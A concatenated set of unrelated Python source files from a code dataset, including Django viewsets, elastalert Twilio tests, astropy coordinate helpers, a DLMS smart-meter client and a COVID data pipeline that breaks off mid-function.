'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2693.2 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, default',
}
| StarcoderdataPython |
26308 | <reponame>AkshayVKumar/ActivityManager<filename>activity/views.py<gh_stars>0
from rest_framework import viewsets
from .serializers import MemberSerializer, ActivityPeriodSerializer
from activity.models import UserProfile, ActivityPeriod
from django.http import JsonResponse
#class for displaying members
class MemberViewSet(viewsets.ModelViewSet):
queryset = UserProfile.objects.all()
serializer_class = MemberSerializer
#class for taking activity input
class ActivityPeriodViewSet(viewsets.ModelViewSet):
queryset = ActivityPeriod.objects.all()
serializer_class = ActivityPeriodSerializer
| StarcoderdataPython |
31741 | <reponame>bdunnette/derbot
from django.db.models.signals import pre_save
from django.dispatch import receiver
import random
import fractions
import humanize
# from derbot.names.tasks import generate_number
from derbot.names.models import DerbyName
@receiver(pre_save, sender=DerbyName)
def generate_number(sender, instance, **kwargs):
if instance.cleared and not instance.number:
jersey_number = str(random.uniform(1, 9999))[
random.randint(0, 3) : random.randint(5, 7)
].strip(".")
to_humanize = bool(random.getrandbits(1))
if to_humanize == True:
jersey_number = humanize.fractional(jersey_number).replace("/", "⁄")
instance.number = jersey_number
| StarcoderdataPython |
3361171 | <reponame>drakaru/elastalert
import pytest
from elastalert.alerters.twilio import TwilioAlerter
from elastalert.loaders import FileRulesLoader
from elastalert.util import EAException
def test_twilio_getinfo():
rule = {
'name': '<NAME>',
'type': 'any',
'alert_subject': 'Cool subject',
'twilio_account_sid': 'xxxxx1',
'twilio_auth_token': '<PASSWORD>',
'twilio_to_number': 'xxxxx3',
'twilio_from_number': 'xxxxx4',
'alert': []
}
rules_loader = FileRulesLoader({})
rules_loader.load_modules(rule)
alert = TwilioAlerter(rule)
expected_data = {
'type': 'twilio',
'twilio_client_name': 'xxxxx4'
}
actual_data = alert.get_info()
assert expected_data == actual_data
@pytest.mark.parametrize('twilio_account_sid, twilio_auth_token, twilio_to_number, expected_data', [
('', '', '', 'Missing required option(s): twilio_account_sid, twilio_auth_token, twilio_to_number'),
('xxxx1', '', '', 'Missing required option(s): twilio_account_sid, twilio_auth_token, twilio_to_number'),
('', 'xxxx2', '', 'Missing required option(s): twilio_account_sid, twilio_auth_token, twilio_to_number'),
('', '', 'INFO', 'Missing required option(s): twilio_account_sid, twilio_auth_token, twilio_to_number'),
('xxxx1', 'xxxx2', '', 'Missing required option(s): twilio_account_sid, twilio_auth_token, twilio_to_number'),
('xxxx1', '', 'INFO', 'Missing required option(s): twilio_account_sid, twilio_auth_token, twilio_to_number'),
('', 'xxxx2', 'INFO', 'Missing required option(s): twilio_account_sid, twilio_auth_token, twilio_to_number'),
('xxxx1', 'xxxx2', 'INFO',
{
'type': 'twilio',
'twilio_client_name': 'xxxxx4'
}),
])
def test_twilio_required_error(twilio_account_sid, twilio_auth_token, twilio_to_number, expected_data):
try:
rule = {
'name': 'Test Rule',
'type': 'any',
'alert_subject': 'Cool subject',
'twilio_from_number': 'xxxxx4',
'alert': []
}
if twilio_account_sid != '':
rule['twilio_account_sid'] = twilio_account_sid
if twilio_auth_token != '':
rule['twilio_auth_token'] = twilio_auth_token
if twilio_to_number != '':
rule['twilio_to_number'] = twilio_to_number
rules_loader = FileRulesLoader({})
rules_loader.load_modules(rule)
alert = TwilioAlerter(rule)
actual_data = alert.get_info()
assert expected_data == actual_data
except Exception as ea:
assert expected_data in str(ea)
@pytest.mark.parametrize('twilio_use_copilot, twilio_message_service_sid, twilio_from_number, expected_data', [
(True, None, 'test', True),
(False, 'test', None, True),
])
def test_twilio_use_copilot(twilio_use_copilot, twilio_message_service_sid, twilio_from_number, expected_data):
try:
rule = {
'name': 'Test Rule',
'type': 'any',
'alert_subject': 'Cool subject',
'twilio_account_sid': 'xxxxx1',
'twilio_auth_token': 'xxxxx2',
'twilio_to_number': 'xxxxx3',
'alert': []
}
if twilio_use_copilot != '':
rule['twilio_use_copilot'] = twilio_use_copilot
if twilio_message_service_sid != '':
rule['twilio_message_service_sid'] = twilio_message_service_sid
if twilio_from_number != '':
rule['twilio_from_number'] = twilio_from_number
rules_loader = FileRulesLoader({})
rules_loader.load_modules(rule)
alert = TwilioAlerter(rule)
match = {
'@timestamp': '2021-01-01T00:00:00',
'somefield': 'foobarbaz'
}
alert.alert([match])
except EAException:
assert expected_data
| StarcoderdataPython |
1736786 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This module contains convenience functions for coordinate-related functionality.
This is generally just wrapping around the object-oriented coordinates
framework, but it is useful for some users who are used to more functional
interfaces.
"""
import warnings
from collections.abc import Sequence
import numpy as np
from .. import units as u
from ..constants import c
from .. import _erfa as erfa
from ..io import ascii
from ..utils import isiterable, data
from .sky_coordinate import SkyCoord
from .builtin_frames import GCRS, PrecessedGeocentric
from .representation import SphericalRepresentation, CartesianRepresentation
from .builtin_frames.utils import get_jd12
__all__ = ['cartesian_to_spherical', 'spherical_to_cartesian', 'get_sun',
'get_constellation', 'concatenate_representations', 'concatenate']
def cartesian_to_spherical(x, y, z):
"""
Converts 3D rectangular cartesian coordinates to spherical polar
coordinates.
Note that the resulting angles are latitude/longitude or
elevation/azimuthal form. I.e., the origin is along the equator
rather than at the north pole.
.. note::
This function simply wraps functionality provided by the
`~astropy.coordinates.CartesianRepresentation` and
`~astropy.coordinates.SphericalRepresentation` classes. In general,
for both performance and readability, we suggest using these classes
directly. But for situations where a quick one-off conversion makes
sense, this function is provided.
Parameters
----------
x : scalar, array-like, or `~astropy.units.Quantity`
The first cartesian coordinate.
y : scalar, array-like, or `~astropy.units.Quantity`
The second cartesian coordinate.
z : scalar, array-like, or `~astropy.units.Quantity`
The third cartesian coordinate.
Returns
-------
r : `~astropy.units.Quantity`
The radial coordinate (in the same units as the inputs).
lat : `~astropy.units.Quantity`
The latitude in radians
lon : `~astropy.units.Quantity`
The longitude in radians
"""
if not hasattr(x, 'unit'):
x = x * u.dimensionless_unscaled
if not hasattr(y, 'unit'):
y = y * u.dimensionless_unscaled
if not hasattr(z, 'unit'):
z = z * u.dimensionless_unscaled
cart = CartesianRepresentation(x, y, z)
sph = cart.represent_as(SphericalRepresentation)
return sph.distance, sph.lat, sph.lon
def spherical_to_cartesian(r, lat, lon):
"""
Converts spherical polar coordinates to rectangular cartesian
coordinates.
Note that the input angles should be in latitude/longitude or
elevation/azimuthal form. I.e., the origin is along the equator
rather than at the north pole.
.. note::
This is a low-level function used internally in
`astropy.coordinates`. It is provided for users if they really
want to use it, but it is recommended that you use the
`astropy.coordinates` coordinate systems.
Parameters
----------
r : scalar, array-like, or `~astropy.units.Quantity`
The radial coordinate (in the same units as the inputs).
lat : scalar, array-like, or `~astropy.units.Quantity`
The latitude (in radians if array or scalar)
lon : scalar, array-like, or `~astropy.units.Quantity`
The longitude (in radians if array or scalar)
Returns
-------
x : float or array
The first cartesian coordinate.
y : float or array
The second cartesian coordinate.
z : float or array
The third cartesian coordinate.
"""
if not hasattr(r, 'unit'):
r = r * u.dimensionless_unscaled
if not hasattr(lat, 'unit'):
lat = lat * u.radian
if not hasattr(lon, 'unit'):
lon = lon * u.radian
sph = SphericalRepresentation(distance=r, lat=lat, lon=lon)
cart = sph.represent_as(CartesianRepresentation)
return cart.x, cart.y, cart.z
def get_sun(time):
"""
Determines the location of the sun at a given time (or times, if the input
is an array `~astropy.time.Time` object), in geocentric coordinates.
Parameters
----------
time : `~astropy.time.Time`
The time(s) at which to compute the location of the sun.
Returns
-------
newsc : `~astropy.coordinates.SkyCoord`
The location of the sun as a `~astropy.coordinates.SkyCoord` in the
`~astropy.coordinates.GCRS` frame.
Notes
-----
The algorithm for determining the sun/earth relative position is based
on the simplified version of VSOP2000 that is part of ERFA. Compared to
JPL's ephemeris, it should be good to about 4 km (in the Sun-Earth
vector) from 1900-2100 C.E., 8 km for the 1800-2200 span, and perhaps
250 km over the 1000-3000.
"""
earth_pv_helio, earth_pv_bary = erfa.epv00(*get_jd12(time, 'tdb'))
# We have to manually do aberration because we're outputting directly into
# GCRS
earth_p = earth_pv_helio['p']
earth_v = earth_pv_bary['v']
# convert barycentric velocity to units of c, but keep as array for passing in to erfa
earth_v /= c.to_value(u.au/u.d)
dsun = np.sqrt(np.sum(earth_p**2, axis=-1))
invlorentz = (1-np.sum(earth_v**2, axis=-1))**0.5
properdir = erfa.ab(earth_p/dsun.reshape(dsun.shape + (1,)),
-earth_v, dsun, invlorentz)
cartrep = CartesianRepresentation(x=-dsun*properdir[..., 0] * u.AU,
y=-dsun*properdir[..., 1] * u.AU,
z=-dsun*properdir[..., 2] * u.AU)
return SkyCoord(cartrep, frame=GCRS(obstime=time))
# global dictionary that caches repeatedly-needed info for get_constellation
_constellation_data = {}
def get_constellation(coord, short_name=False, constellation_list='iau'):
"""
Determines the constellation(s) a given coordinate object contains.
Parameters
----------
coord : coordinate object
The object to determine the constellation of.
short_name : bool
If True, the returned names are the IAU-sanctioned abbreviated
names. Otherwise, full names for the constellations are used.
constellation_list : str
The set of constellations to use. Currently only ``'iau'`` is
supported, meaning the 88 "modern" constellations endorsed by the IAU.
Returns
-------
constellation : str or string array
If ``coords`` contains a scalar coordinate, returns the name of the
constellation. If it is an array coordinate object, it returns an array
of names.
Notes
-----
To determine which constellation a point on the sky is in, this precesses
to B1875, and then uses the Delporte boundaries of the 88 modern
constellations, as tabulated by
`Roman 1987 <http://cdsarc.u-strasbg.fr/viz-bin/Cat?VI/42>`_.
"""
if constellation_list != 'iau':
raise ValueError("only 'iau' us currently supported for constellation_list")
# read the data files and cache them if they haven't been already
if not _constellation_data:
cdata = data.get_pkg_data_contents('data/constellation_data_roman87.dat')
ctable = ascii.read(cdata, names=['ral', 'rau', 'decl', 'name'])
cnames = data.get_pkg_data_contents('data/constellation_names.dat', encoding='UTF8')
cnames_short_to_long = dict([(l[:3], l[4:])
for l in cnames.split('\n')
if not l.startswith('#')])
cnames_long = np.array([cnames_short_to_long[nm] for nm in ctable['name']])
_constellation_data['ctable'] = ctable
_constellation_data['cnames_long'] = cnames_long
else:
ctable = _constellation_data['ctable']
cnames_long = _constellation_data['cnames_long']
isscalar = coord.isscalar
# if it is geocentric, we reproduce the frame but with the 1875 equinox,
# which is where the constellations are defined
# this yields a "dubious year" warning because ERFA considers the year 1875
# "dubious", probably because UTC isn't well-defined then and precession
# models aren't precisely calibrated back to then. But it's plenty
# sufficient for constellations
with warnings.catch_warnings():
warnings.simplefilter('ignore', erfa.ErfaWarning)
constel_coord = coord.transform_to(PrecessedGeocentric(equinox='B1875'))
if isscalar:
rah = constel_coord.ra.ravel().hour
decd = constel_coord.dec.ravel().deg
else:
rah = constel_coord.ra.hour
decd = constel_coord.dec.deg
constellidx = -np.ones(len(rah), dtype=int)
notided = constellidx == -1 # should be all
for i, row in enumerate(ctable):
msk = (row['ral'] < rah) & (rah < row['rau']) & (decd > row['decl'])
constellidx[notided & msk] = i
notided = constellidx == -1
if np.sum(notided) == 0:
break
else:
raise ValueError('Could not find constellation for coordinates {0}'.format(constel_coord[notided]))
if short_name:
names = ctable['name'][constellidx]
else:
names = cnames_long[constellidx]
if isscalar:
return names[0]
else:
return names
def _concatenate_components(reps_difs, names):
""" Helper function for the concatenate function below. Gets and
concatenates all of the individual components for an iterable of
representations or differentials.
"""
values = []
for name in names:
data_vals = []
for x in reps_difs:
data_val = getattr(x, name)
data_vals.append(data_val.reshape(1, ) if x.isscalar else data_val)
concat_vals = np.concatenate(data_vals)
# Hack because np.concatenate doesn't fully work with Quantity
if isinstance(concat_vals, u.Quantity):
concat_vals._unit = data_val.unit
values.append(concat_vals)
return values
def concatenate_representations(reps):
"""
Combine multiple representation objects into a single instance by
concatenating the data in each component.
Currently, all of the input representations have to be the same type. This
properly handles differential or velocity data, but all input objects must
have the same differential object type as well.
Parameters
----------
reps : sequence of representation objects
The objects to concatenate
Returns
-------
rep : `~astropy.coordinates.BaseRepresentation` subclass
A single representation object with its data set to the concatenation of
all the elements of the input sequence of representations.
"""
if not isinstance(reps, (Sequence, np.ndarray)):
raise TypeError('Input must be a list or iterable of representation '
'objects.')
# First, validate that the represenations are the same, and
# concatenate all of the positional data:
rep_type = type(reps[0])
if any(type(r) != rep_type for r in reps):
raise TypeError('Input representations must all have the same type.')
# Construct the new representation with the concatenated data from the
# representations passed in
values = _concatenate_components(reps,
rep_type.attr_classes.keys())
new_rep = rep_type(*values)
has_diff = any('s' in rep.differentials for rep in reps)
if has_diff and any('s' not in rep.differentials for rep in reps):
raise ValueError('Input representations must either all contain '
'differentials, or not contain differentials.')
if has_diff:
dif_type = type(reps[0].differentials['s'])
if any('s' not in r.differentials or
type(r.differentials['s']) != dif_type
for r in reps):
raise TypeError('All input representations must have the same '
'differential type.')
values = _concatenate_components([r.differentials['s'] for r in reps],
dif_type.attr_classes.keys())
new_dif = dif_type(*values)
new_rep = new_rep.with_differentials({'s': new_dif})
return new_rep
def concatenate(coords):
"""
Combine multiple coordinate objects into a single
`~astropy.coordinates.SkyCoord`.
"Coordinate objects" here mean frame objects with data,
`~astropy.coordinates.SkyCoord`, or representation objects. Currently,
they must all be in the same frame, but in a future version this may be
relaxed to allow inhomogenous sequences of objects.
Parameters
----------
coords : sequence of coordinate objects
The objects to concatenate
Returns
-------
cskycoord : SkyCoord
A single sky coordinate with its data set to the concatenation of all
the elements in ``coords``
"""
if getattr(coords, 'isscalar', False) or not isiterable(coords):
raise TypeError('The argument to concatenate must be iterable')
scs = [SkyCoord(coord, copy=False) for coord in coords]
# Check that all frames are equivalent
for sc in scs[1:]:
if not sc.is_equivalent_frame(scs[0]):
raise ValueError("All inputs must have equivalent frames: "
"{0} != {1}".format(sc, scs[0]))
# TODO: this can be changed to SkyCoord.from_representation() for a speed
# boost when we switch to using classmethods
return SkyCoord(concatenate_representations([c.data for c in coords]),
frame=scs[0].frame)
| StarcoderdataPython |
3342944 | <reponame>spikefairway/fsVOIManager
#!/usr/bin/env python
# coding: utf-8
__author__ = 'keisu-ma'
import sys
import pandas as pd
from fsVOIManager import mergeFSVOI
def argumentError():
print("Invalid argument!")
print("Usage: %s input_NIfTI_VOI_file VOI_set_file output_NIfTI_VOI_file" % (sys.argv[0]))
sys.exit(0)
if __name__ == "__main__":
# Load argument
try:
inFile = sys.argv[1]
voiSetFile = sys.argv[2]
outFile = sys.argv[3]
except ValueError:
argumentError()
except IndexError:
argumentError()
# Load VOI set
voidef = pd.read_csv(voiSetFile)
# Apply VOI set
mergeFSVOI(inFile, outFile, voidef)
| StarcoderdataPython |
64217 | <reponame>Layty/dlms-cosem<filename>dlms_cosem/clients/dlms_client.py
import contextlib
import logging
from typing import *
import attr
from typing_extensions import Protocol # type: ignore
from dlms_cosem import cosem, dlms_data, enumerations, exceptions, state, utils
from dlms_cosem.clients.blocking_tcp_transport import BlockingTcpTransport
from dlms_cosem.clients.hdlc_transport import SerialHdlcTransport
from dlms_cosem.connection import DlmsConnection
from dlms_cosem.protocol import acse, xdlms
from dlms_cosem.protocol.xdlms import ConfirmedServiceErrorApdu
from dlms_cosem.protocol.xdlms.selective_access import RangeDescriptor
LOG = logging.getLogger(__name__)
class DataResultError(Exception):
""" Error retrieveing data"""
class ActionError(Exception):
"""Error performing an action"""
class HLSError(Exception):
"""error in HLS procedure"""
class DlmsIOInterface(Protocol):
"""
Protocol for a class that should be used for transport.
"""
def connect(self) -> None:
...
def disconnect(self) -> None:
...
def send(self, bytes_to_send: bytes) -> bytes:
...
@attr.s(auto_attribs=True)
class DlmsClient:
client_logical_address: int
server_logical_address: int
io_interface: DlmsIOInterface
authentication_method: Optional[enumerations.AuthenticationMechanism] = attr.ib(
default=None
)
password: Optional[bytes] = attr.ib(default=None)
encryption_key: Optional[bytes] = attr.ib(default=None)
authentication_key: Optional[bytes] = attr.ib(default=None)
security_suite: Optional[int] = attr.ib(default=0)
dedicated_ciphering: bool = attr.ib(default=False)
block_transfer: bool = attr.ib(default=False)
max_pdu_size: int = attr.ib(default=65535)
client_system_title: Optional[bytes] = attr.ib(default=None)
client_initial_invocation_counter: int = attr.ib(default=0)
meter_initial_invocation_counter: int = attr.ib(default=0)
dlms_connection: DlmsConnection = attr.ib(
default=attr.Factory(
lambda self: DlmsConnection(
client_system_title=self.client_system_title,
authentication_method=self.authentication_method,
password=self.password,
global_encryption_key=self.encryption_key,
global_authentication_key=self.authentication_key,
use_dedicated_ciphering=self.dedicated_ciphering,
use_block_transfer=self.block_transfer,
security_suite=self.security_suite,
max_pdu_size=self.max_pdu_size,
client_invocation_counter=self.client_initial_invocation_counter,
meter_invocation_counter=self.meter_initial_invocation_counter,
),
takes_self=True,
)
)
@classmethod
def with_serial_hdlc_transport(
cls,
serial_port: str,
client_logical_address: int,
server_logical_address: int,
server_physical_address: Optional[int],
client_physical_address: Optional[int] = None,
baud_rate: int = 9600,
authentication_method: Optional[enumerations.AuthenticationMechanism] = None,
password: Optional[bytes] = None,
encryption_key: Optional[bytes] = None,
authentication_key: Optional[bytes] = None,
security_suite: Optional[int] = 0,
dedicated_ciphering: bool = False,
block_transfer: bool = False,
max_pdu_size: int = 65535,
client_system_title: Optional[bytes] = None,
client_initial_invocation_counter: int = 0,
meter_initial_invocation_counter: int = 0,
):
serial_client = SerialHdlcTransport(
client_logical_address=client_logical_address,
client_physical_address=client_physical_address,
server_logical_address=server_logical_address,
server_physical_address=server_physical_address,
serial_port=serial_port,
serial_baud_rate=baud_rate,
)
return cls(
client_logical_address=client_logical_address,
server_logical_address=server_logical_address,
authentication_method=authentication_method,
password=password,
encryption_key=encryption_key,
authentication_key=authentication_key,
security_suite=security_suite,
dedicated_ciphering=dedicated_ciphering,
block_transfer=block_transfer,
max_pdu_size=max_pdu_size,
client_system_title=client_system_title,
client_initial_invocation_counter=client_initial_invocation_counter,
meter_initial_invocation_counter=meter_initial_invocation_counter,
io_interface=serial_client,
)
@classmethod
def with_tcp_transport(
cls,
host: str,
port: int,
client_logical_address: int,
server_logical_address: int,
authentication_method: Optional[enumerations.AuthenticationMechanism] = None,
password: Optional[bytes] = None,
encryption_key: Optional[bytes] = None,
authentication_key: Optional[bytes] = None,
security_suite: Optional[int] = 0,
dedicated_ciphering: bool = False,
block_transfer: bool = False,
max_pdu_size: int = 65535,
client_system_title: Optional[bytes] = None,
client_initial_invocation_counter: int = 0,
meter_initial_invocation_counter: int = 0,
):
tcp_transport = BlockingTcpTransport(
host=host,
port=port,
client_logical_address=client_logical_address,
server_logical_address=server_logical_address,
)
return cls(
client_logical_address=client_logical_address,
server_logical_address=server_logical_address,
authentication_method=authentication_method,
password=password,
encryption_key=encryption_key,
authentication_key=authentication_key,
security_suite=security_suite,
dedicated_ciphering=dedicated_ciphering,
block_transfer=block_transfer,
max_pdu_size=max_pdu_size,
client_system_title=client_system_title,
client_initial_invocation_counter=client_initial_invocation_counter,
meter_initial_invocation_counter=meter_initial_invocation_counter,
io_interface=tcp_transport,
)
@contextlib.contextmanager
def session(self) -> "DlmsClient":
self.connect()
self.associate()
yield self
self.release_association()
self.disconnect()
def get(
self,
cosem_attribute: cosem.CosemAttribute,
access_descriptor: Optional[RangeDescriptor] = None,
) -> bytes:
self.send(
xdlms.GetRequestNormal(
cosem_attribute=cosem_attribute, access_selection=access_descriptor
)
)
all_data_received = False
data = bytearray()
while not all_data_received:
get_response = self.next_event()
if isinstance(get_response, xdlms.GetResponseNormal):
data.extend(get_response.data)
all_data_received = True
continue
if isinstance(get_response, xdlms.GetResponseWithBlock):
data.extend(get_response.data)
self.send(
xdlms.GetRequestNext(
invoke_id_and_priority=get_response.invoke_id_and_priority,
block_number=get_response.block_number,
)
)
continue
if isinstance(get_response, xdlms.GetResponseLastBlock):
data.extend(get_response.data)
all_data_received = True
continue
if isinstance(get_response, xdlms.GetResponseLastBlockWithError):
raise DataResultError(
f"Error in blocktransfer of GET response: {get_response.error!r}"
)
if isinstance(get_response, xdlms.GetResponseNormalWithError):
raise DataResultError(
f"Could not perform GET request: {get_response.error!r}"
)
return bytes(data)
def set(self, cosem_attribute: cosem.CosemAttribute, data: bytes):
self.send(xdlms.SetRequestNormal(cosem_attribute=cosem_attribute, data=data))
return self.next_event()
def action(self, method: cosem.CosemMethod, data: bytes):
self.send(xdlms.ActionRequestNormal(cosem_method=method, data=data))
response = self.next_event()
if isinstance(response, xdlms.ActionResponseNormalWithError):
raise ActionError(response.error.name)
elif isinstance(response, xdlms.ActionResponseNormalWithData):
if response.status != enumerations.ActionResultStatus.SUCCESS:
raise ActionError(f"Unsuccessful ActionRequest: {response.status.name}")
return response.data
else:
if response.status != enumerations.ActionResultStatus.SUCCESS:
raise ActionError(f"Unsuccessful ActionRequest: {response.status.name}")
return
def associate(
self,
association_request: Optional[acse.ApplicationAssociationRequestApdu] = None,
) -> acse.ApplicationAssociationResponseApdu:
# the aarq can be overridden or the standard one from the connection is used.
aarq = association_request or self.dlms_connection.get_aarq()
self.send(aarq)
response = self.next_event()
# we could have received an exception from the meter.
if isinstance(response, xdlms.ExceptionResponseApdu):
raise exceptions.DlmsClientException(
f"DLMS Exception: {response.state_error!r}:{response.service_error!r}"
)
# the association might not be accepted by the meter
if isinstance(response, acse.ApplicationAssociationResponseApdu):
if response.result is not enumerations.AssociationResult.ACCEPTED:
# there could be an error suppled with the reject.
extra_error = None
if response.user_information:
if isinstance(
response.user_information.content, ConfirmedServiceErrorApdu
):
extra_error = response.user_information.content.error
raise exceptions.DlmsClientException(
f"Unable to perform Association: {response.result!r} and "
f"{response.result_source_diagnostics!r}, extra info: {extra_error}"
)
else:
raise exceptions.LocalDlmsProtocolError(
"Did not receive an AARE after sending AARQ"
)
if self.should_send_hls_reply():
try:
hls_response = self.send_hls_reply()
except ActionError as e:
raise HLSError from e
hls_data = utils.parse_as_dlms_data(hls_response)
if not hls_response:
raise HLSError("Did not receive any HLS response data")
if not self.dlms_connection.hls_response_valid(hls_data):
raise HLSError(
f"Meter did not respond with correct challenge calculation"
)
return response
def should_send_hls_reply(self) -> bool:
return (
self.dlms_connection.state.current_state
== state.SHOULD_SEND_HLS_SEVER_CHALLENGE_RESULT
)
def send_hls_reply(self) -> Optional[bytes]:
return self.action(
method=cosem.CosemMethod(
enumerations.CosemInterface.ASSOCIATION_LN,
cosem.Obis(0, 0, 40, 0, 0),
1,
),
data=dlms_data.OctetStringData(
self.dlms_connection.get_hls_reply()
).to_bytes(),
)
def release_association(self) -> acse.ReleaseResponseApdu:
rlrq = self.dlms_connection.get_rlrq()
self.send(rlrq)
rlre = self.next_event()
return rlre
def connect(self):
self.io_interface.connect()
def disconnect(self):
self.io_interface.disconnect()
def send(self, *events):
for event in events:
data = self.dlms_connection.send(event)
response_bytes = self.io_interface.send(data)
self.dlms_connection.receive_data(response_bytes)
def next_event(self):
event = self.dlms_connection.next_event()
LOG.info(f"Received {event}")
return event
| StarcoderdataPython |
1748632 | # Import the needed libraries
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import datetime
# For linear regression function
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.linear_model import LogisticRegression, LinearRegression
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score, mean_squared_error
# For clustering function
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler, OneHotEncoder, PolynomialFeatures
import boto3
from io import StringIO
import warnings
warnings.filterwarnings("ignore")
BUCKETNAME = 'covid-v1-part-3-data-bucket'
def report_date(lag=1):
'''
returns a string representing the date for the report we are running
lag is an int, representing how many days in the past to run the report,
the default lag is 1 days
'''
today=str(datetime.datetime.now())[:8]
date = int(str(datetime.datetime.now())[8:10])
if date > lag:
day = date - lag
zero = str(0)
if day < 10:
return f'{today}{zero}{day}'
return f'{today}{day}'
# If the date is the first of the month, take the report
# for the last day of the prior month
month = str(int(today[5:7]) - 1)
year = today[:4]
thirty_one = ['01', '03', '05', '07', '08', '10', '12']
thirty = ['04', '06', '09', '11']
if month in thirty_one:
day = '31'
elif month in thirty:
day = '30'
else:
day = '28'
return f'{year}-{month}-{day}'
def jhu_date(date):
'''
returns a string representing the date for the report we are running
date is a string representing the date found by report_date()
'''
year = date[:4]
month = date[5:7]
day = date[8:10]
zero = 0
#if int(day) < 10:
# return f'{month}-{zero}{day}-{year}'
return f'{month}-{day}-{year}'
def daily_snapshot(datapath, covpath, date, bucket=BUCKETNAME):
'''
sends the daily snapshot of the covid totals incorporated in to the
static data set to a data folder to be used by the models
datapath is a string, the relative path through the s3 bucket
covpath is a string, the relative or absolute path the the daily
updated covid-19 data from the Johns Hopkins github repo
date is a string representing the report date
bucket is a string, the name of the s3 bucket for storage in aws
'''
# set filename for the daily data
cov_date = jhu_date(date)
filename = f'{covpath}/{cov_date}.csv'
print(f'searching {covpath} for {cov_date}.csv')
try:
# create new dataframe with the covid data
covid = pd.read_csv(filename)
print(f'SUCCESS, creating "covid" dataframe using {filename}')
except:
print(f'Exception: {filename} not found. Check your file location or try to run prior day\'s report')
# strip down the covid data to cases and deaths
covid = covid[covid['Country_Region']=='US']
covid['county_state'] = covid['Admin2'] + ' County, ' + covid['Province_State']
covid.set_index('county_state', inplace=True)
covid.rename(columns=({
'Confirmed': 'confirmed_cases',
'Deaths': 'deaths'
}), inplace=True)
covid=covid[['confirmed_cases', 'deaths']]
# pull in prior collective data set
filename = 'cov_soc_eco.csv'
### DELETE THIS PRINT STATEMENT UPON COMPLETION###
print(f'searching {datapath} for {filename}')
# create new dataframe with the covid data
full = pd.read_csv(f's3://{bucket}/{datapath}/{filename}')
print(f'SUCCESS, creating dataframe using {filename}')
# set the index in the dataframe to 'county_state'
full['county_state'] = full['county'] + ", " + full['state']
full.set_index('county_state', inplace=True)
### This part will vary **********************
# set the index in the covid dataframe for consistency
# print the cases and deaths numbers from the old data_set
print("Think about changing this to be yesterday's numbers:")
print('cases total on prior data set: ', full['confirmed_cases'].sum())
print('deaths total on prior data set: ', full['deaths'].sum())
# open the dataframe confirmed cases and deaths columns for replacement
full.drop(columns=['confirmed_cases', 'deaths'], inplace=True)
# merge the dataframes
full = full.merge(covid, how='left', left_on=full.index, right_on=covid.index)
full['county_state'] = full['key_0']
full.drop(columns='key_0', inplace=True)
full.set_index('county_state', inplace=True)
# print the cases and deaths numbers from the new data_set
print("Think about changing this to be today's numbers:")
print('cases total on new data set: ', full['confirmed_cases'].sum())
print('deaths total on new data set: ', full['deaths'].sum())
# overwrite the covid-per-capita columns
full['cases_per_100k'] = (full['confirmed_cases'] / full['Population']) * 100_000
full['deaths_per_100k']= (full['deaths'] / full['Population']) * 100_000
# export the new dataframe to csv
csv_buffer = StringIO()
full.to_csv(csv_buffer)
s3_resource = boto3.resource('s3')
s3_resource.Object(bucket, f'{datapath}/updated_snapshot.csv' ).put(Body=csv_buffer.getvalue())
print('SUCCESS, sending file updated_snapshot.csv to data folder')
print('\nDaily Snapshot run, commence Machine Learning models\n')
def show_rmse(model_1, model_2):
'''
returns 1 for error, 0 for complete
prints the Root Mean Squared error of one or two models
'''
try:
print('Root Mean Squared Error of the LR: ',(mean_squared_error(y_test, model_1.predict(X_test)))**(1/2))
print('Root Mean Squared Error of the GB: ',(mean_squared_error(y_test, model_2.predict(X_test)))**(1/2))
return 0
except:
print('An exception occurred')
return 1
def i_regress(dataframe, features, target, test_size=0.2, n_estimators=100):
'''
returns two models, a LinearRegression() and GradientBoostingRegressor(),
in that order, and also prints out the r2 scores of each
dataframe is the dataframe being used for the testing
features is a list of numeric data
target is a string, the column name from the dataframe of the target
test_size is a float between 0.0 and 1.0 exclusive used
in the train_test_split() function
n_estimators is an int used in the GradientBoostingRegressor()
'''
# import librarires if exporting this function to a useful library
lr = LinearRegression()
gb = GradientBoostingRegressor(n_estimators=n_estimators)
X = dataframe[features]
y = dataframe[target]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size,
random_state=42)
lr.fit(X_train, y_train)
gb.fit(X_train, y_train)
print(f'Models successfully built: Target = "{target}"')
print('*'*30)
print('Training Scores: ')
print('LinearRegression : ', lr.score(X_train, y_train))
print('GradientBoostingRegressor: ', gb.score(X_train, y_train))
print('*'*30)
print('Testing Scores: ')
print('LinearRegression : ', lr.score(X_test, y_test))
print('GradientBoostingRegressor: ', gb.score(X_test, y_test))
print('*'*30)
show_rmse(lr, gb)
print('\n')
return lr, gb
def run_regression_models(datapath, filename, date, model=False, bucket=BUCKETNAME):
'''
Runs Linear Regression models and sends a new 85_col.csv to data storage
datapath is a string, the relative or absolute path to the data storage
filename is the name of the daily snapshot file
date is a string representing the report date
bucket is a string representing the s3 bucket name
'''
# call the pandas read_csv() function to create a dataframe
covid_df = pd.read_csv(f's3://{bucket}/{datapath}/{filename}')
covid_df.set_index('county_state', inplace=True)
# use one-hot-encoding to split up the states
covid_df = pd.get_dummies(columns=['state_abr'], data=covid_df, prefix="", prefix_sep="")
# create a features list
cols = dict(covid_df.dtypes)
features = []
for col in cols:
if "object" not in str(cols[col]):
features.append(col)
# export this dataset for use in the KMeans model:
csv_buffer = StringIO()
covid_df[features].to_csv(csv_buffer)
s3_resource = boto3.resource('s3')
s3_resource.Object(bucket, f'{datapath}/85_cols.csv').put(Body=csv_buffer.getvalue())
#commenting out this next bit as changing to an s3 StringIO upload
#covid_df[features].to_csv(datapath+'85_cols.csv')
# Remove the target columns from the features list
features.remove('deaths')
features.remove('confirmed_cases')
features.remove('deaths_per_100k')
features.remove('cases_per_100k')
targets_list = ['deaths', 'confirmed_cases', 'deaths_per_100k', 'cases_per_100k']
# If the model input is envoked, run models:
if model:
